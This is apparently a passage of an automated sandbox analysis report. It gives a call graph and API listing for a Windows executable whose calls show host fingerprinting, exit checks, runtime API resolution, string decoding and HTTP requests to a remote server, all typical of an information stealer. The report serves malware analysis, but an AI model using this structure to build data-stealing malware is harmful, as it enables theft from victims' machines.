API calls 29542->29543 29544 4034dd 29543->29544 29545 4045c0 34 API calls 29544->29545 29546 4034f6 29545->29546 29547 4045c0 34 API calls 29546->29547 29548 40350f 29547->29548 29549 4045c0 34 API calls 29548->29549 29550 403528 29549->29550 29551 4045c0 34 API calls 29550->29551 29552 403541 29551->29552 29553 4045c0 34 API calls 29552->29553 29554 40355a 29553->29554 29555 4045c0 34 API calls 29554->29555 29556 403573 29555->29556 29557 4045c0 34 API calls 29556->29557 29558 40358c 29557->29558 29559 4045c0 34 API calls 29558->29559 29560 4035a5 29559->29560 29561 4045c0 34 API calls 29560->29561 29562 4035be 29561->29562 29563 4045c0 34 API calls 29562->29563 29564 4035d7 29563->29564 29565 4045c0 34 API calls 29564->29565 29566 4035f0 29565->29566 29567 4045c0 34 API calls 29566->29567 29568 403609 29567->29568 29569 4045c0 34 API calls 29568->29569 29570 403622 29569->29570 29571 4045c0 34 API calls 29570->29571 29572 40363b 29571->29572 29573 4045c0 34 API calls 29572->29573 29574 403654 29573->29574 29575 4045c0 34 API calls 29574->29575 29576 40366d 29575->29576 29577 4045c0 34 API calls 29576->29577 29578 403686 29577->29578 29579 4045c0 34 API calls 29578->29579 29580 40369f 29579->29580 29581 4045c0 34 API calls 29580->29581 29582 4036b8 29581->29582 29583 4045c0 34 API calls 29582->29583 29584 4036d1 29583->29584 29585 4045c0 34 API calls 29584->29585 29586 4036ea 29585->29586 29587 4045c0 34 API calls 29586->29587 29588 403703 29587->29588 29589 4045c0 34 API calls 29588->29589 29590 40371c 29589->29590 29591 4045c0 34 API calls 29590->29591 29592 403735 29591->29592 29593 4045c0 34 API calls 29592->29593 29594 40374e 29593->29594 29595 4045c0 34 API calls 29594->29595 29596 403767 29595->29596 29597 4045c0 34 API calls 29596->29597 29598 403780 29597->29598 29599 4045c0 34 API calls 29598->29599 29600 403799 29599->29600 29601 4045c0 34 API calls 29600->29601 29602 4037b2 29601->29602 29603 4045c0 34 API calls 29602->29603 29604 4037cb 29603->29604 29605 4045c0 34 API calls 29604->29605 29606 4037e4 29605->29606 29607 4045c0 34 API calls 29606->29607 29608 4037fd 29607->29608 29609 4045c0 34 API calls 29608->29609 29610 403816 29609->29610 29611 4045c0 34 API calls 29610->29611 29612 40382f 29611->29612 29613 4045c0 34 API calls 29612->29613 29614 403848 29613->29614 29615 4045c0 34 API calls 29614->29615 29616 403861 29615->29616 29617 4045c0 34 API calls 29616->29617 29618 40387a 29617->29618 29619 4045c0 34 API calls 29618->29619 29620 403893 29619->29620 29621 4045c0 34 API calls 29620->29621 29622 4038ac 29621->29622 29623 4045c0 34 API calls 29622->29623 29624 4038c5 29623->29624 29625 4045c0 34 API calls 29624->29625 29626 4038de 29625->29626 29627 4045c0 34 API calls 29626->29627 29628 4038f7 29627->29628 29629 4045c0 34 API calls 29628->29629 29630 403910 29629->29630 29631 4045c0 34 API calls 29630->29631 29632 403929 29631->29632 29633 4045c0 34 API calls 29632->29633 29634 403942 29633->29634 29635 4045c0 34 API calls 29634->29635 29636 40395b 29635->29636 29637 4045c0 34 API calls 29636->29637 29638 403974 29637->29638 29639 4045c0 34 API calls 29638->29639 29640 40398d 29639->29640 29641 4045c0 34 API calls 29640->29641 29642 4039a6 29641->29642 29643 4045c0 34 API calls 29642->29643 29644 4039bf 29643->29644 29645 4045c0 34 API calls 29644->29645 29646 4039d8 29645->29646 29647 4045c0 34 API calls 29646->29647 29648 4039f1 29647->29648 29649 4045c0 34 API calls 29648->29649 29650 403a0a 29649->29650 29651 4045c0 34 API calls 29650->29651 29652 403a23 29651->29652 29653 4045c0 34 API calls 29652->29653 29654 403a3c 29653->29654 29655 4045c0 34 API calls 29654->29655 29656 403a55 29655->29656 29657 4045c0 34 API calls 29656->29657 29658 403a6e 29657->29658 29659 4045c0 34 API calls 29658->29659 29660 403a87 29659->29660 29661 4045c0 34 API calls 29660->29661 29662 403aa0 29661->29662 29663 4045c0 34 API calls 29662->29663 29664 403ab9 29663->29664 29665 4045c0 34 API calls 29664->29665 29666 403ad2 29665->29666 29667 4045c0 34 API calls 29666->29667 29668 403aeb 29667->29668 29669 4045c0 34 API calls 29668->29669 29670 403b04 29669->29670 29671 4045c0 34 API calls 29670->29671 29672 403b1d 29671->29672 29673 4045c0 34 API calls 29672->29673 29674 403b36 29673->29674 29675 4045c0 34 API calls 29674->29675 29676 403b4f 29675->29676 29677 4045c0 34 API calls 29676->29677 29678 403b68 29677->29678 29679 4045c0 34 API calls 29678->29679 29680 403b81 29679->29680 29681 4045c0 34 API calls 29680->29681 29682 403b9a 29681->29682 29683 4045c0 34 API calls 29682->29683 29684 403bb3 29683->29684 29685 4045c0 34 API calls 29684->29685 29686 403bcc 29685->29686 29687 4045c0 34 API calls 29686->29687 29688 403be5 29687->29688 29689 4045c0 34 API calls 29688->29689 29690 403bfe 29689->29690 29691 4045c0 34 API calls 29690->29691 29692 403c17 29691->29692 29693 4045c0 34 API calls 29692->29693 29694 403c30 29693->29694 29695 4045c0 34 API calls 29694->29695 29696 403c49 29695->29696 29697 4045c0 34 API calls 29696->29697 29698 403c62 29697->29698 29699 4045c0 34 API calls 29698->29699 29700 403c7b 29699->29700 29701 4045c0 34 API calls 29700->29701 29702 403c94 29701->29702 29703 4045c0 34 API calls 29702->29703 29704 403cad 29703->29704 29705 4045c0 34 API calls 29704->29705 29706 403cc6 29705->29706 29707 4045c0 34 API calls 29706->29707 29708 403cdf 29707->29708 29709 4045c0 34 API calls 29708->29709 29710 403cf8 29709->29710 29711 4045c0 34 API calls 29710->29711 29712 403d11 29711->29712 29713 4045c0 34 API calls 29712->29713 29714 403d2a 29713->29714 29715 4045c0 34 API calls 29714->29715 29716 403d43 29715->29716 29717 4045c0 34 API calls 29716->29717 29718 403d5c 29717->29718 29719 4045c0 34 API calls 29718->29719 29720 403d75 29719->29720 29721 4045c0 34 API calls 29720->29721 29722 403d8e 29721->29722 29723 4045c0 34 API calls 29722->29723 29724 403da7 29723->29724 29725 4045c0 34 API calls 29724->29725 29726 403dc0 29725->29726 29727 4045c0 34 API calls 29726->29727 29728 403dd9 29727->29728 29729 4045c0 34 API calls 29728->29729 29730 403df2 29729->29730 29731 4045c0 34 API calls 29730->29731 29732 403e0b 29731->29732 29733 4045c0 34 API calls 29732->29733 29734 403e24 29733->29734 29735 4045c0 34 API calls 29734->29735 29736 403e3d 29735->29736 29737 4045c0 34 API calls 29736->29737 29738 403e56 29737->29738 29739 4045c0 34 API calls 29738->29739 29740 403e6f 29739->29740 29741 4045c0 34 API calls 29740->29741 29742 403e88 29741->29742 29743 4045c0 34 API calls 29742->29743 29744 403ea1 29743->29744 29745 4045c0 34 API calls 29744->29745 29746 403eba 29745->29746 29747 4045c0 34 API calls 29746->29747 29748 403ed3 29747->29748 29749 4045c0 34 API calls 29748->29749 29750 403eec 29749->29750 29751 4045c0 34 API calls 29750->29751 29752 403f05 29751->29752 29753 4045c0 34 API calls 29752->29753 29754 403f1e 29753->29754 29755 4045c0 34 API calls 29754->29755 29756 403f37 29755->29756 29757 4045c0 34 API calls 29756->29757 29758 403f50 29757->29758 29759 4045c0 34 API calls 29758->29759 29760 403f69 29759->29760 29761 4045c0 34 API calls 29760->29761 29762 403f82 29761->29762 29763 4045c0 34 API calls 29762->29763 29764 403f9b 29763->29764 29765 4045c0 34 API calls 29764->29765 29766 403fb4 29765->29766 29767 4045c0 34 API calls 29766->29767 29768 403fcd 29767->29768 29769 4045c0 34 API calls 29768->29769 29770 403fe6 29769->29770 29771 4045c0 34 API calls 29770->29771 29772 403fff 29771->29772 29773 4045c0 34 API calls 29772->29773 29774 404018 29773->29774 29775 4045c0 34 API calls 29774->29775 29776 404031 29775->29776 29777 4045c0 34 API calls 29776->29777 29778 40404a 29777->29778 29779 4045c0 34 API calls 29778->29779 29780 404063 29779->29780 29781 4045c0 34 API calls 29780->29781 29782 40407c 29781->29782 29783 4045c0 34 API calls 29782->29783 29784 404095 29783->29784 29785 4045c0 34 API calls 29784->29785 29786 4040ae 29785->29786 29787 4045c0 34 API calls 29786->29787 29788 4040c7 29787->29788 29789 4045c0 34 API calls 29788->29789 29790 4040e0 29789->29790 29791 4045c0 34 API calls 29790->29791 29792 4040f9 29791->29792 29793 4045c0 34 API calls 29792->29793 29794 404112 29793->29794 29795 4045c0 34 API calls 29794->29795 29796 40412b 29795->29796 29797 4045c0 34 API calls 29796->29797 29798 404144 29797->29798 29799 4045c0 34 API calls 29798->29799 29800 40415d 29799->29800 29801 4045c0 34 API calls 29800->29801 29802 404176 29801->29802 29803 4045c0 34 API calls 29802->29803 29804 40418f 29803->29804 29805 4045c0 34 API calls 29804->29805 29806 4041a8 29805->29806 29807 4045c0 34 API calls 29806->29807 29808 4041c1 29807->29808 29809 4045c0 34 API calls 29808->29809 29810 4041da 29809->29810 29811 4045c0 34 API calls 29810->29811 29812 4041f3 29811->29812 29813 4045c0 34 API calls 29812->29813 29814 40420c 29813->29814 29815 4045c0 34 API calls 29814->29815 29816 404225 29815->29816 29817 4045c0 34 API calls 29816->29817 29818 40423e 29817->29818 29819 4045c0 34 API calls 29818->29819 29820 404257 29819->29820 29821 4045c0 34 API calls 29820->29821 29822 404270 29821->29822 29823 4045c0 34 API calls 29822->29823 29824 404289 29823->29824 29825 4045c0 34 API calls 29824->29825 29826 4042a2 29825->29826 29827 4045c0 34 API calls 29826->29827 29828 4042bb 29827->29828 29829 4045c0 34 API calls 29828->29829 29830 4042d4 29829->29830 29831 4045c0 34 API calls 29830->29831 29832 4042ed 29831->29832 29833 4045c0 34 API calls 29832->29833 29834 404306 29833->29834 29835 4045c0 34 API calls 29834->29835 29836 40431f 29835->29836 29837 4045c0 34 API calls 29836->29837 29838 404338 29837->29838 29839 4045c0 34 API calls 29838->29839 29840 404351 29839->29840 29841 4045c0 34 API calls 29840->29841 29842 40436a 29841->29842 29843 4045c0 34 API calls 29842->29843 29844 404383 29843->29844 29845 4045c0 34 API calls 29844->29845 29846 40439c 29845->29846 29847 4045c0 34 API calls 29846->29847 29848 4043b5 29847->29848 29849 4045c0 34 API calls 29848->29849 29850 4043ce 29849->29850 29851 4045c0 34 API calls 29850->29851 29852 4043e7 29851->29852 29853 4045c0 34 API calls 29852->29853 29854 404400 29853->29854 29855 4045c0 34 API calls 29854->29855 29856 404419 29855->29856 29857 4045c0 34 API calls 29856->29857 29858 404432 29857->29858 29859 4045c0 34 API calls 29858->29859 29860 40444b 29859->29860 29861 4045c0 34 API calls 29860->29861 29862 404464 29861->29862 29863 4045c0 34 API calls 29862->29863 29864 40447d 29863->29864 29865 4045c0 34 API calls 29864->29865 29866 404496 29865->29866 29867 4045c0 34 API calls 29866->29867 29868 4044af 29867->29868 29869 4045c0 34 API calls 29868->29869 29870 4044c8 29869->29870 29871 4045c0 34 API calls 29870->29871 29872 4044e1 29871->29872 29873 4045c0 34 API calls 29872->29873 29874 4044fa 29873->29874 29875 4045c0 34 API calls 29874->29875 29876 404513 29875->29876 29877 4045c0 34 API calls 29876->29877 29878 40452c 29877->29878 29879 4045c0 34 API calls 29878->29879 29880 404545 29879->29880 29881 4045c0 34 API calls 29880->29881 29882 40455e 29881->29882 29883 4045c0 34 API calls 29882->29883 29884 404577 29883->29884 29885 4045c0 34 API calls 29884->29885 29886 404590 29885->29886 29887 4045c0 34 API calls 29886->29887 29888 4045a9 29887->29888 29889 419c10 29888->29889 29890 419c20 43 API calls 29889->29890 29891 41a036 8 API calls 29889->29891 29890->29891 29892 41a146 29891->29892 29893 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29891->29893 29894 41a153 8 API calls 29892->29894 29895 41a216 29892->29895 29893->29892 29894->29895 29896 41a298 29895->29896 29897 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29895->29897 29898 41a2a5 6 API calls 29896->29898 29899 41a337 29896->29899 29897->29896 29898->29899 29900 41a344 9 API calls 29899->29900 29901 41a41f 29899->29901 29900->29901 29902 41a4a2 29901->29902 29903 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29901->29903 29904 41a4ab GetProcAddress GetProcAddress 29902->29904 29905 41a4dc 29902->29905 29903->29902 29904->29905 29906 41a515 29905->29906 29907 41a4e5 GetProcAddress GetProcAddress 29905->29907 29908 41a612 29906->29908 29909 41a522 10 API calls 29906->29909 29907->29906 29910 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29908->29910 29911 41a67d 29908->29911 29909->29908 29910->29911 29912 41a686 GetProcAddress 29911->29912 29913 41a69e 29911->29913 29912->29913 29914 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29913->29914 29915 415ca3 29913->29915 29914->29915 29916 401590 29915->29916 30191 401670 29916->30191 29919 41a7a0 lstrcpy 29920 4015b5 29919->29920 29921 41a7a0 lstrcpy 29920->29921 29922 4015c7 29921->29922 29923 41a7a0 lstrcpy 29922->29923 29924 4015d9 29923->29924 29925 41a7a0 lstrcpy 29924->29925 29926 401663 29925->29926 29927 415510 29926->29927 29928 415521 29927->29928 29929 41a820 2 API calls 29928->29929 29930 41552e 29929->29930 29931 41a820 2 API calls 29930->29931 29932 41553b 29931->29932 29933 41a820 2 API calls 29932->29933 29934 415548 29933->29934 29935 41a740 lstrcpy 29934->29935 29936 415555 29935->29936 29937 41a740 lstrcpy 29936->29937 29938 415562 29937->29938 29939 41a740 lstrcpy 29938->29939 29940 41556f 29939->29940 29941 41a740 lstrcpy 29940->29941 29980 41557c 29941->29980 29942 415643 StrCmpCA 29942->29980 29943 4156a0 StrCmpCA 29944 4157dc 29943->29944 29943->29980 29945 41a8a0 lstrcpy 29944->29945 29946 4157e8 29945->29946 29947 41a820 2 API calls 29946->29947 29948 4157f6 29947->29948 29951 41a820 2 API calls 29948->29951 29949 415856 StrCmpCA 29952 415991 29949->29952 29949->29980 29950 41a740 lstrcpy 29950->29980 29954 415805 29951->29954 29953 41a8a0 lstrcpy 29952->29953 29956 41599d 29953->29956 29957 401670 lstrcpy 29954->29957 29955 401590 lstrcpy 29955->29980 29959 41a820 2 API calls 29956->29959 29981 415811 29957->29981 29958 41a820 lstrlenA lstrcpy 29958->29980 29961 4159ab 29959->29961 29960 4152c0 29 API calls 29960->29980 29965 41a820 2 API calls 29961->29965 29962 415a0b StrCmpCA 29963 415a16 Sleep 29962->29963 29964 415a28 29962->29964 29963->29980 29966 41a8a0 lstrcpy 29964->29966 29967 4159ba 29965->29967 29968 415a34 29966->29968 29969 401670 lstrcpy 29967->29969 29970 41a820 2 API calls 29968->29970 29969->29981 29971 415a43 29970->29971 29972 41a820 2 API calls 29971->29972 29973 415a52 29972->29973 29976 401670 lstrcpy 29973->29976 29974 41a8a0 lstrcpy 29974->29980 29975 41578a StrCmpCA 29975->29980 29976->29981 29977 41a7a0 lstrcpy 29977->29980 29978 41593f StrCmpCA 29978->29980 29979 4151f0 23 API calls 29979->29980 29980->29942 29980->29943 29980->29949 29980->29950 29980->29955 29980->29958 29980->29960 29980->29962 29980->29974 29980->29975 29980->29977 29980->29978 29980->29979 29981->29035 29983 417553 GetVolumeInformationA 29982->29983 29984 41754c 29982->29984 29985 417591 29983->29985 29984->29983 29986 4175fc GetProcessHeap HeapAlloc 29985->29986 29987 417619 29986->29987 29988 417628 wsprintfA 29986->29988 29989 41a740 lstrcpy 29987->29989 29990 41a740 lstrcpy 29988->29990 29991 415da7 29989->29991 29990->29991 29991->29056 29993 41a7a0 lstrcpy 29992->29993 29994 404899 29993->29994 30200 4047b0 29994->30200 29996 4048a5 29997 41a740 lstrcpy 29996->29997 29998 4048d7 29997->29998 29999 41a740 lstrcpy 29998->29999 30000 4048e4 29999->30000 30001 41a740 lstrcpy 30000->30001 30002 4048f1 30001->30002 30003 41a740 lstrcpy 30002->30003 30004 4048fe 30003->30004 30005 41a740 lstrcpy 30004->30005 30006 40490b InternetOpenA StrCmpCA 30005->30006 30007 404944 30006->30007 30008 404955 30007->30008 30009 404ecb InternetCloseHandle 30007->30009 30213 418b60 GetSystemTime lstrcpy lstrcpy 30008->30213 30011 404ee8 30009->30011 30208 409ac0 CryptStringToBinaryA 30011->30208 30012 404963 30214 41a920 lstrcpy lstrcpy lstrcatA 30012->30214 30015 404976 30017 41a8a0 lstrcpy 30015->30017 30022 40497f 30017->30022 30018 41a820 2 API calls 30019 404f05 30018->30019 30021 41a9b0 4 API calls 30019->30021 30020 404f27 ctype 30024 41a7a0 lstrcpy 30020->30024 30023 404f1b 30021->30023 30026 41a9b0 4 API calls 30022->30026 30025 41a8a0 lstrcpy 30023->30025 30037 404f57 30024->30037 30025->30020 30027 4049a9 30026->30027 30028 41a8a0 lstrcpy 30027->30028 30029 4049b2 30028->30029 30030 41a9b0 4 API calls 30029->30030 30031 4049d1 30030->30031 30032 41a8a0 lstrcpy 30031->30032 30033 4049da 30032->30033 30215 41a920 lstrcpy lstrcpy lstrcatA 30033->30215 30035 4049f8 30036 41a8a0 lstrcpy 30035->30036 30038 404a01 30036->30038 30037->29059 30039 41a9b0 4 API calls 30038->30039 30040 404a20 30039->30040 30041 41a8a0 lstrcpy 30040->30041 30042 404a29 30041->30042 30043 41a9b0 4 API calls 30042->30043 30044 404a48 30043->30044 30045 41a8a0 lstrcpy 30044->30045 30046 404a51 30045->30046 30047 41a9b0 4 API calls 30046->30047 30048 404a7d 30047->30048 30216 41a920 lstrcpy lstrcpy lstrcatA 30048->30216 30050 404a84 30051 41a8a0 lstrcpy 30050->30051 30052 404a8d 30051->30052 30053 404aa3 InternetConnectA 30052->30053 30053->30009 30054 404ad3 HttpOpenRequestA 30053->30054 30056 404b28 30054->30056 30057 404ebe InternetCloseHandle 30054->30057 30058 41a9b0 4 API calls 30056->30058 30057->30009 30059 404b3c 30058->30059 30060 41a8a0 lstrcpy 30059->30060 30061 404b45 30060->30061 30217 41a920 lstrcpy lstrcpy lstrcatA 30061->30217 30063 404b63 30064 41a8a0 lstrcpy 30063->30064 30065 404b6c 30064->30065 30066 41a9b0 4 API calls 30065->30066 30067 404b8b 30066->30067 30068 41a8a0 lstrcpy 30067->30068 30069 404b94 30068->30069 30070 41a9b0 4 API calls 30069->30070 30071 404bb5 30070->30071 30072 41a8a0 lstrcpy 30071->30072 30073 404bbe 30072->30073 30074 41a9b0 4 API calls 30073->30074 30075 404bde 30074->30075 30076 41a8a0 lstrcpy 30075->30076 30077 404be7 30076->30077 30078 41a9b0 4 API calls 30077->30078 30079 404c06 30078->30079 30080 41a8a0 lstrcpy 30079->30080 30081 404c0f 30080->30081 30218 41a920 lstrcpy lstrcpy lstrcatA 30081->30218 30083 404c2d 30084 41a8a0 lstrcpy 30083->30084 30085 404c36 30084->30085 30086 41a9b0 4 API calls 30085->30086 30087 404c55 30086->30087 30088 41a8a0 lstrcpy 30087->30088 30089 404c5e 30088->30089 30090 41a9b0 4 API calls 30089->30090 30091 404c7d 30090->30091 30092 41a8a0 lstrcpy 30091->30092 30093 404c86 30092->30093 30219 41a920 lstrcpy lstrcpy lstrcatA 30093->30219 30095 404ca4 30096 41a8a0 lstrcpy 30095->30096 30097 404cad 30096->30097 30098 41a9b0 4 API calls 30097->30098 30099 404ccc 30098->30099 30100 41a8a0 lstrcpy 30099->30100 30101 404cd5 30100->30101 30102 41a9b0 4 API calls 30101->30102 30103 404cf6 30102->30103 30104 41a8a0 lstrcpy 30103->30104 30105 404cff 30104->30105 30106 41a9b0 4 API calls 30105->30106 30107 404d1f 30106->30107 30108 41a8a0 lstrcpy 30107->30108 30109 404d28 30108->30109 30110 41a9b0 4 API calls 30109->30110 30111 404d47 30110->30111 30112 41a8a0 lstrcpy 30111->30112 30113 404d50 30112->30113 30220 41a920 lstrcpy lstrcpy lstrcatA 30113->30220 30115 404d6e 30116 41a8a0 lstrcpy 30115->30116 30117 404d77 30116->30117 30118 41a740 lstrcpy 30117->30118 30119 404d92 30118->30119 30221 41a920 lstrcpy lstrcpy lstrcatA 30119->30221 30121 404db3 30222 41a920 lstrcpy lstrcpy lstrcatA 30121->30222 30123 404dba 30124 41a8a0 lstrcpy 30123->30124 30125 404dc6 30124->30125 30126 404de7 lstrlenA 30125->30126 30127 404dfa 30126->30127 30128 404e03 lstrlenA 30127->30128 30223 41aad0 30128->30223 30130 404e13 HttpSendRequestA 30131 404e32 InternetReadFile 30130->30131 30132 404e67 InternetCloseHandle 30131->30132 30137 404e5e 30131->30137 30134 41a800 30132->30134 30134->30057 30135 41a9b0 4 API calls 30135->30137 30136 41a8a0 lstrcpy 30136->30137 30137->30131 30137->30132 30137->30135 30137->30136 30228 41aad0 30138->30228 30140 4117c4 StrCmpCA 30141 4117d7 30140->30141 30142 4117cf ExitProcess 30140->30142 30143 4117e7 strtok_s 30141->30143 30146 4117f4 30143->30146 30144 4119c2 30144->29061 30145 41199e strtok_s 30145->30146 30146->30144 30146->30145 30147 4118ad StrCmpCA 30146->30147 30148 4118cf StrCmpCA 30146->30148 30149 4118f1 StrCmpCA 30146->30149 30150 411951 StrCmpCA 30146->30150 30151 411970 StrCmpCA 30146->30151 30152 411913 StrCmpCA 30146->30152 30153 411932 StrCmpCA 30146->30153 30154 41185d StrCmpCA 30146->30154 30155 41187f StrCmpCA 30146->30155 30156 41a820 lstrlenA lstrcpy 30146->30156 30157 41a820 2 API calls 30146->30157 30147->30146 30148->30146 30149->30146 30150->30146 30151->30146 30152->30146 30153->30146 30154->30146 30155->30146 30156->30146 30157->30145 30158->29067 30159->29069 30160->29075 30161->29077 30162->29083 30163->29085 30164->29089 30165->29093 30166->29097 30167->29103 30168->29105 30169->29109 30170->29123 30171->29127 30172->29126 30173->29122 30174->29126 30175->29141 30176->29159 30177->29130 30178->29151 30179->29154 30180->29162 30181->29166 30182->29147 30183->29155 30184->29180 30185->29184 30186->29183 30187->29179 30188->29183 30189->29193 30192 41a7a0 lstrcpy 30191->30192 30193 401683 30192->30193 30194 41a7a0 lstrcpy 30193->30194 30195 401695 30194->30195 30196 41a7a0 lstrcpy 30195->30196 30197 4016a7 30196->30197 30198 41a7a0 lstrcpy 30197->30198 30199 4015a3 30198->30199 30199->29919 30224 401030 30200->30224 30204 404838 lstrlenA 30227 41aad0 30204->30227 30206 404848 InternetCrackUrlA 30207 404867 30206->30207 30207->29996 30209 409af9 LocalAlloc 30208->30209 30210 404eee 30208->30210 30209->30210 30211 409b14 CryptStringToBinaryA 30209->30211 30210->30018 30210->30020 30211->30210 30212 409b39 LocalFree 30211->30212 30212->30210 30213->30012 30214->30015 30215->30035 30216->30050 30217->30063 30218->30083 30219->30095 30220->30115 30221->30121 30222->30123 30223->30130 30225 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 30224->30225 30226 41aad0 30225->30226 30226->30204 30227->30206 30228->30140 30351 2313823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 30352 416ab1 902 API calls 30323 4069f3 7 API calls 30389 231118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 30390 231cd8f 6 API calls 2 library calls 30354 41cafe 219 API calls 5 library calls 30355 231102b StrCmpCA strtok_s lstrlen lstrcpy 30357 23130f9 7 API calls 28800 401190 28807 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 28800->28807 28802 40119e 28803 4011cc 28802->28803 28809 417850 GetProcessHeap HeapAlloc GetUserNameA 28802->28809 28805 4011b7 28805->28803 28806 4011c4 ExitProcess 28805->28806 28808 417939 28807->28808 28808->28802 28810 4178c3 28809->28810 28810->28805 30398 23135e4 9 API calls 30399 23119e7 StrCmpCA ExitProcess strtok_s strtok_s 30358 231cce9 162 API calls ___crtGetStringTypeA 30360 41ce9f 69 API calls __amsg_exit 30361 23130d0 9 API calls 30299 4088a4 RaiseException task __CxxThrowException@8 30300 4180a5 GetProcessHeap HeapFree 30365 2313823 8 API calls 30326 41b9b0 RtlUnwind 30327 23113c7 strtok_s strtok_s

                                      Control-flow Graph

                                      APIs
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                      • strlen.MSVCRT ref: 004046F0
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
